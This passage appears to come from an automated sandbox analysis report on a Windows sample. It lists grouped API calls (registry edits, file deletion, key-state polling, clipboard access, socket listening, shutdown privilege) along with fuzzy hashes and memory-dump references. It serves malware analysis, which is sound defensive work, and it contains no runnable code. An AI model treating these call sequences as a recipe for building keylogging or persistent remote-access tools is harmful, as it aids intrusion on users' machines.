                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00900C94
                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00900D1D
                              • RegCloseKey.ADVAPI32(?), ref: 0090103D
                              • RegCloseKey.ADVAPI32(00000000), ref: 0090104A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Close$ConnectCreateRegistryValue
                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                              • API String ID: 536824911-966354055
                              • Opcode ID: d21a389a2b6b93033274c48e88ae44642a5e896c34de4c0ef3d78d90b6d60c8c
                              • Instruction ID: 9ef861fed063fc2d2941af8b2f10d08323f04c67732c5a71f738cccc23cd2a92
                              • Opcode Fuzzy Hash: d21a389a2b6b93033274c48e88ae44642a5e896c34de4c0ef3d78d90b6d60c8c
                              • Instruction Fuzzy Hash: FD023B752046119FDB14EF18C891E2ABBE5FF89714F04885DF98ADB6A2CB34ED41CB42
                              APIs
                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 008EF37E
                              • _wcscmp.LIBCMT ref: 008EF393
                              • _wcscmp.LIBCMT ref: 008EF3AA
                                • Part of subcall function 008E45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008E45DC
                              • FindNextFileW.KERNEL32(00000000,?), ref: 008EF3D9
                              • FindClose.KERNEL32(00000000), ref: 008EF3E4
                              • FindFirstFileW.KERNEL32(*.*,?), ref: 008EF400
                              • _wcscmp.LIBCMT ref: 008EF427
                              • _wcscmp.LIBCMT ref: 008EF43E
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008EF450
                              • SetCurrentDirectoryW.KERNEL32(0093A5A0), ref: 008EF46E
                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 008EF478
                              • FindClose.KERNEL32(00000000), ref: 008EF485
                              • FindClose.KERNEL32(00000000), ref: 008EF497
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                              • String ID: *.*
                              • API String ID: 1824444939-438819550
                              • Opcode ID: 9f51499a0341645785805ac4aca2c7593725b71bc94460f653ddc8477ae57a10
                              • Instruction ID: e0a710e4c2f9acfd2dc897598e3179e14166cd628844f5067034d050b53d2d61
                              • Opcode Fuzzy Hash: 9f51499a0341645785805ac4aca2c7593725b71bc94460f653ddc8477ae57a10
                              • Instruction Fuzzy Hash: D331E4725002596FDB20AB69EC98ADE73ACEF4A368F100175F950E21E2D730DA44CB54
                              APIs
                                • Part of subcall function 008D874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008D8766
                                • Part of subcall function 008D874A: GetLastError.KERNEL32(?,008D822A,?,?,?), ref: 008D8770
                                • Part of subcall function 008D874A: GetProcessHeap.KERNEL32(00000008,?,?,008D822A,?,?,?), ref: 008D877F
                                • Part of subcall function 008D874A: HeapAlloc.KERNEL32(00000000,?,008D822A,?,?,?), ref: 008D8786
                                • Part of subcall function 008D874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008D879D
                                • Part of subcall function 008D87E7: GetProcessHeap.KERNEL32(00000008,008D8240,00000000,00000000,?,008D8240,?), ref: 008D87F3
                                • Part of subcall function 008D87E7: HeapAlloc.KERNEL32(00000000,?,008D8240,?), ref: 008D87FA
                                • Part of subcall function 008D87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,008D8240,?), ref: 008D880B
                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008D825B
                              • _memset.LIBCMT ref: 008D8270
                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008D828F
                              • GetLengthSid.ADVAPI32(?), ref: 008D82A0
                              • GetAce.ADVAPI32(?,00000000,?), ref: 008D82DD
                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008D82F9
                              • GetLengthSid.ADVAPI32(?), ref: 008D8316
                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 008D8325
                              • HeapAlloc.KERNEL32(00000000), ref: 008D832C
                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 008D834D
                              • CopySid.ADVAPI32(00000000), ref: 008D8354
                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008D8385
                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008D83AB
                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008D83BF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                              • String ID:
                              • API String ID: 3996160137-0
                              • Opcode ID: 7ee7ee7007342e6918dd8b0baa9828fec64f1846ac8adb0747e40917ed420a63
                              • Instruction ID: 6ecce5e3f2ffa4801e11e2d34a7f0feac3ffd49aa413f8db672e8b0c50cb6ee7
                              • Opcode Fuzzy Hash: 7ee7ee7007342e6918dd8b0baa9828fec64f1846ac8adb0747e40917ed420a63
                              • Instruction Fuzzy Hash: 3D615671904209EFDF14DFA4DC94AAEBBB9FF04B00F04822AE815E6391DB319A15DB60
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                              • API String ID: 0-4052911093
                              • Opcode ID: 060c4d8b011cf725ed310c5987e8d2a3618d8e53f6f84d9e2c997f5d71181a91
                              • Instruction ID: bc71180da7f2b1d62bfcd1d9cbfd02470ea2e11bac71063307b2e61e993c1a5d
                              • Opcode Fuzzy Hash: 060c4d8b011cf725ed310c5987e8d2a3618d8e53f6f84d9e2c997f5d71181a91
                              • Instruction Fuzzy Hash: 77726D71E00219DBDF24DF58C8947AEB7B5FF48314F18816AE859EB394EB309981CB90
                              APIs
                              • __lock.LIBCMT ref: 008B41AF
                                • Part of subcall function 008A9E4B: __mtinitlocknum.LIBCMT ref: 008A9E5D
                                • Part of subcall function 008A9E4B: EnterCriticalSection.KERNEL32(00000000,?,008A9CBC,0000000D), ref: 008A9E76
                              • ____lc_codepage_func.LIBCMT ref: 008B41F6
                              • __getenv_helper_nolock.LIBCMT ref: 008B4217
                              • _free.LIBCMT ref: 008B424A
                                • Part of subcall function 008A2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,008A9C64), ref: 008A2FA9
                                • Part of subcall function 008A2F95: GetLastError.KERNEL32(00000000,?,008A9C64), ref: 008A2FBB
                              • _strlen.LIBCMT ref: 008B4251
                              • __malloc_crt.LIBCMT ref: 008B4258
                              • _strlen.LIBCMT ref: 008B4276
                              • __invoke_watson.LIBCMT ref: 008B4299
                              • _free.LIBCMT ref: 008B42A8
                              • GetTimeZoneInformation.KERNEL32(00944AF8,00000000,00000000,00000000,00000000,00000000,0093C070,00000030,008B3F3B,0093C050,00000008,008A70B8), ref: 008B42B9
                              • WideCharToMultiByte.KERNEL32(?,00000000,00944AFC,000000FF,?,0000003F,00000000,?), ref: 008B4332
                              • WideCharToMultiByte.KERNEL32(?,00000000,00944B50,000000FF,FFFFFFFE,0000003F,00000000,?), ref: 008B436B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ByteCharMultiWide_free_strlen$CriticalEnterErrorFreeHeapInformationLastSectionTimeZone____lc_codepage_func__getenv_helper_nolock__invoke_watson__lock__malloc_crt__mtinitlocknum
                              • String ID:
                              • API String ID: 2302051780-0
                              • Opcode ID: 804c222b30beccdee6a0f4d9170d6a89ce61b29a5656cabf4ec327a5cb5a4704
                              • Instruction ID: 5cb23b42232a6cae4c84e1fbe32a34350ee97d6c5c11ee8a1e6e586f7fa106ba
                              • Opcode Fuzzy Hash: 804c222b30beccdee6a0f4d9170d6a89ce61b29a5656cabf4ec327a5cb5a4704
                              • Instruction Fuzzy Hash: 12A18F709042099EDF159FA9D842BEDBBB8FF4A710F14106AF410E7392DB749D41DB26
                              APIs
                                • Part of subcall function 009010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00900038,?,?), ref: 009010BC
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00900737
                                • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 009007D6
                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0090086E
                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00900AAD
                              • RegCloseKey.ADVAPI32(00000000), ref: 00900ABA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                              • String ID:
                              • API String ID: 1240663315-0
                              • Opcode ID: 736e41259a1aaa59cd0b0ab606662539f930d52d8c3fd1e007256a53371e0ef1
                              • Instruction ID: f1ba15ba4a41e4443e2a5e9b1113f78b6e3ca78f65e6a81934068bde0d55a3d5
                              • Opcode Fuzzy Hash: 736e41259a1aaa59cd0b0ab606662539f930d52d8c3fd1e007256a53371e0ef1
                              • Instruction Fuzzy Hash: D3E12E71204210AFCB14DF29C895E6ABBE9FF89714F04896DF499D72A2DB30ED05CB52
                              APIs
                              • GetKeyboardState.USER32(?), ref: 008E0241
                              • GetAsyncKeyState.USER32(000000A0), ref: 008E02C2
                              • GetKeyState.USER32(000000A0), ref: 008E02DD
                              • GetAsyncKeyState.USER32(000000A1), ref: 008E02F7
                              • GetKeyState.USER32(000000A1), ref: 008E030C
                              • GetAsyncKeyState.USER32(00000011), ref: 008E0324
                              • GetKeyState.USER32(00000011), ref: 008E0336
                              • GetAsyncKeyState.USER32(00000012), ref: 008E034E
                              • GetKeyState.USER32(00000012), ref: 008E0360
                              • GetAsyncKeyState.USER32(0000005B), ref: 008E0378
                              • GetKeyState.USER32(0000005B), ref: 008E038A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: State$Async$Keyboard
                              • String ID:
                              • API String ID: 541375521-0
                              • Opcode ID: 16a752a1844f4cfb7a893889078b4c6b2d7d3b73a2a40f74da74c83c7bb503f4
                              • Instruction ID: 03040ae3032a38d42f26c665fb19b94ef6e4b652406833fdde7159c4f5c3aaef
                              • Opcode Fuzzy Hash: 16a752a1844f4cfb7a893889078b4c6b2d7d3b73a2a40f74da74c83c7bb503f4
                              • Instruction Fuzzy Hash: 5D41BB245087C96EFF324A6598183B5BEE0FB13344F48489DD6C5C66C3D7D499C88FA1
                              APIs
                                • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                              • CoInitialize.OLE32 ref: 008F8718
                              • CoUninitialize.OLE32 ref: 008F8723
                              • CoCreateInstance.OLE32(?,00000000,00000017,00912BEC,?), ref: 008F8783
                              • IIDFromString.OLE32(?,?), ref: 008F87F6
                              • VariantInit.OLEAUT32(?), ref: 008F8890
                              • VariantClear.OLEAUT32(?), ref: 008F88F1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                              • API String ID: 834269672-1287834457
                              • Opcode ID: 3fd210a6fe8d9267675a73f6b0b464a62016cdcd508679fd8db99c33a5ac207b
                              • Instruction ID: 53a8c905cc3e83a3304c78eb13cd8bc410f0143e9816495f96412a47f680083c
                              • Opcode Fuzzy Hash: 3fd210a6fe8d9267675a73f6b0b464a62016cdcd508679fd8db99c33a5ac207b
                              • Instruction Fuzzy Hash: 75617830618305DFD710EF24C848B6ABBE8FF88754F144829FA85DB291CB60ED44CB92
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                              • String ID:
                              • API String ID: 1737998785-0
                              • Opcode ID: 74876212b9e3bea53b079f4fe660fcc5f0c4df91c478da92ad891a638c87fec4
                              • Instruction ID: b89c7669cfc068e88373e41286caf24293202f9d0bfeda4bf3b87476d8685817
                              • Opcode Fuzzy Hash: 74876212b9e3bea53b079f4fe660fcc5f0c4df91c478da92ad891a638c87fec4
                              • Instruction Fuzzy Hash: 5B21D3352152289FDB20AF68EC59F7A77A8FF04310F148016F946DB261DB71AD00DB85
                              APIs
                                • Part of subcall function 008848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008848A1,?,?,008837C0,?), ref: 008848CE
                                • Part of subcall function 008E4CD3: GetFileAttributesW.KERNEL32(?,008E3947), ref: 008E4CD4
                              • FindFirstFileW.KERNEL32(?,?), ref: 008E3ADF
                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 008E3B87
                              • MoveFileW.KERNEL32(?,?), ref: 008E3B9A
                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 008E3BB7
                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 008E3BD9
                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 008E3BF5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                              • String ID: \*.*
                              • API String ID: 4002782344-1173974218
                              • Opcode ID: 734536bc883139e16225393d1570532974096000bb6bcd91362befb488cb037c
                              • Instruction ID: 12b8ad53567dc19553f188e471a2c20783d1c7bb46543a3b689d75788f9896ed
                              • Opcode Fuzzy Hash: 734536bc883139e16225393d1570532974096000bb6bcd91362befb488cb037c
                              • Instruction Fuzzy Hash: 46518C318041999ACB15FBA5CE968EDB7B8FF55300F2441A9E442B7091EF30AF09CB62
                              APIs
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 008EF6AB
                              • Sleep.KERNEL32(0000000A), ref: 008EF6DB
                              • _wcscmp.LIBCMT ref: 008EF6EF
                              • _wcscmp.LIBCMT ref: 008EF70A
                              • FindNextFileW.KERNEL32(?,?), ref: 008EF7A8
                              • FindClose.KERNEL32(00000000), ref: 008EF7BE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                              • String ID: *.*
                              • API String ID: 713712311-438819550
                              • Opcode ID: d6afb2422aa0a451246d6a53877332b1ad9de8760f611401bc92f209fa5f4b05
                              • Instruction ID: cf10448efb3e079526449cb997e4cf6ea894aa01f524b1ce5314a4f37b384da7
                              • Opcode Fuzzy Hash: d6afb2422aa0a451246d6a53877332b1ad9de8760f611401bc92f209fa5f4b05
                              • Instruction Fuzzy Hash: 2C41907190025AAFCF11EF65CC85AEEBBB4FF06310F144566E914E21A1EB309E44CF91
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                              • API String ID: 0-1546025612
                              • Opcode ID: 18ccd95921ea49dc9d6658f1763f6187ee1f5b20e138cdf97cf2dc537eb7ffd0
                              • Instruction ID: 6353fd4004a49c266cf5c6ce89cece58ec30df9a8dbaf5cca02dddd68a68ffc9
                              • Opcode Fuzzy Hash: 18ccd95921ea49dc9d6658f1763f6187ee1f5b20e138cdf97cf2dc537eb7ffd0
                              • Instruction Fuzzy Hash: 9BA26C70A0421ECBDF24DF58C990BADB7B1FB54314F2891AAD85AE7280D7349E86DF50
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID:
                              • API String ID: 4104443479-0
                              • Opcode ID: 9adc0099aaafb389ad99637d57f6623f47ed60afc4700712da253b961706e4b0
                              • Instruction ID: 3c6bb2b24976a4cfc95846c0c2880f1b3b3b261115abe78e2a23a86c2481fbcd
                              • Opcode Fuzzy Hash: 9adc0099aaafb389ad99637d57f6623f47ed60afc4700712da253b961706e4b0
                              • Instruction Fuzzy Hash: 7B129C70A00609EFDF14EFA8D985AAEB7F5FF48300F14462AE406E7291EB35AD11CB51
                              APIs
                                • Part of subcall function 008D8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008D8D0D
                                • Part of subcall function 008D8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008D8D3A
                                • Part of subcall function 008D8CC3: GetLastError.KERNEL32 ref: 008D8D47
                              • ExitWindowsEx.USER32(?,00000000), ref: 008E549B
                              Strings
                              Similarity
                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                              • String ID: $@$SeShutdownPrivilege
                              • API String ID: 2234035333-194228
                              • Opcode ID: a22b19db7ab0bbcafad9bd29bc8a1c10c6267730727cb5cce1115c8beb706ada
                              • Instruction ID: 56cb1578e5df8416e2cda65237d2f3acdd379b4d7035f371e9c8147061e4e638
                              • Opcode Fuzzy Hash: a22b19db7ab0bbcafad9bd29bc8a1c10c6267730727cb5cce1115c8beb706ada
                              • Instruction Fuzzy Hash: F70147B1669A496EF738627ADC5ABBA7258FB0274EF200131FC06D20C3DA504C808299
                              APIs
                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 008F65EF
                              • WSAGetLastError.WSOCK32(00000000), ref: 008F65FE
                              • bind.WSOCK32(00000000,?,00000010), ref: 008F661A
                              • listen.WSOCK32(00000000,00000005), ref: 008F6629
                              • WSAGetLastError.WSOCK32(00000000), ref: 008F6643
                              • closesocket.WSOCK32(00000000,00000000), ref: 008F6657
                              Similarity
                              • API ID: ErrorLast$bindclosesocketlistensocket
                              • String ID:
                              • API String ID: 1279440585-0
                              • Opcode ID: 7e66cc691d148d46ec8120397635a1f7522af823076ba2796deff5b6ca1cf172
                              • Instruction ID: 666ef59afa52ee669cd77615881adc9146e0a5339c170b1967188963dccbc568
                              • Opcode Fuzzy Hash: 7e66cc691d148d46ec8120397635a1f7522af823076ba2796deff5b6ca1cf172
                              • Instruction Fuzzy Hash: B7219C312002189FCB10EF68CC95B7EB7A9FF48720F148269EA56E73D1DB74AD119B52
                              APIs
                                • Part of subcall function 008A0FF6: std::exception::exception.LIBCMT ref: 008A102C
                                • Part of subcall function 008A0FF6: __CxxThrowException@8.LIBCMT ref: 008A1041
                              • _memmove.LIBCMT ref: 008D062F
                              • _memmove.LIBCMT ref: 008D0744
                              • _memmove.LIBCMT ref: 008D07EB
                              Similarity
                              • API ID: _memmove$Exception@8Throwstd::exception::exception
                              • String ID:
                              • API String ID: 1300846289-0
                              • Opcode ID: ebcf5237cb717ada82704038c6a72c21e3d5495d03dd6b2061f75ad411356420
                              • Instruction ID: 5184199f539f31c4f2265cc596a3bcc12804596a7620a512589f1cabe14a97e5
                              • Opcode Fuzzy Hash: ebcf5237cb717ada82704038c6a72c21e3d5495d03dd6b2061f75ad411356420
                              • Instruction Fuzzy Hash: 1D026F70A00209EBDF15EF68D985AAE7BB5FF44300F14816AE806EB355EB31DA51CF91
                              APIs
                                • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 008819FA
                              • GetSysColor.USER32(0000000F), ref: 00881A4E
                              • SetBkColor.GDI32(?,00000000), ref: 00881A61
                                • Part of subcall function 00881290: DefDlgProcW.USER32(?,00000020,?), ref: 008812D8
                              Similarity
                              • API ID: ColorProc$LongWindow
                              • String ID:
                              • API String ID: 3744519093-0
                              • Opcode ID: 9329f22e5dcb2db6af62b27c0fe303bd64f404bde7bc50dd3f97d5e93431b0fc
                              • Instruction ID: 567748f7d4e11a7d2fc75ba7b60fe36b4f552089b85af8b2fa6373268a6e6aec
                              • Opcode Fuzzy Hash: 9329f22e5dcb2db6af62b27c0fe303bd64f404bde7bc50dd3f97d5e93431b0fc
                              • Instruction Fuzzy Hash: C6A116B1116568BEDE3CBB28CC5DEBB399CFB82759B14021AF402D62D2DE549D039372
                              APIs
                                • Part of subcall function 008F80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008F80CB
                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 008F6AB1
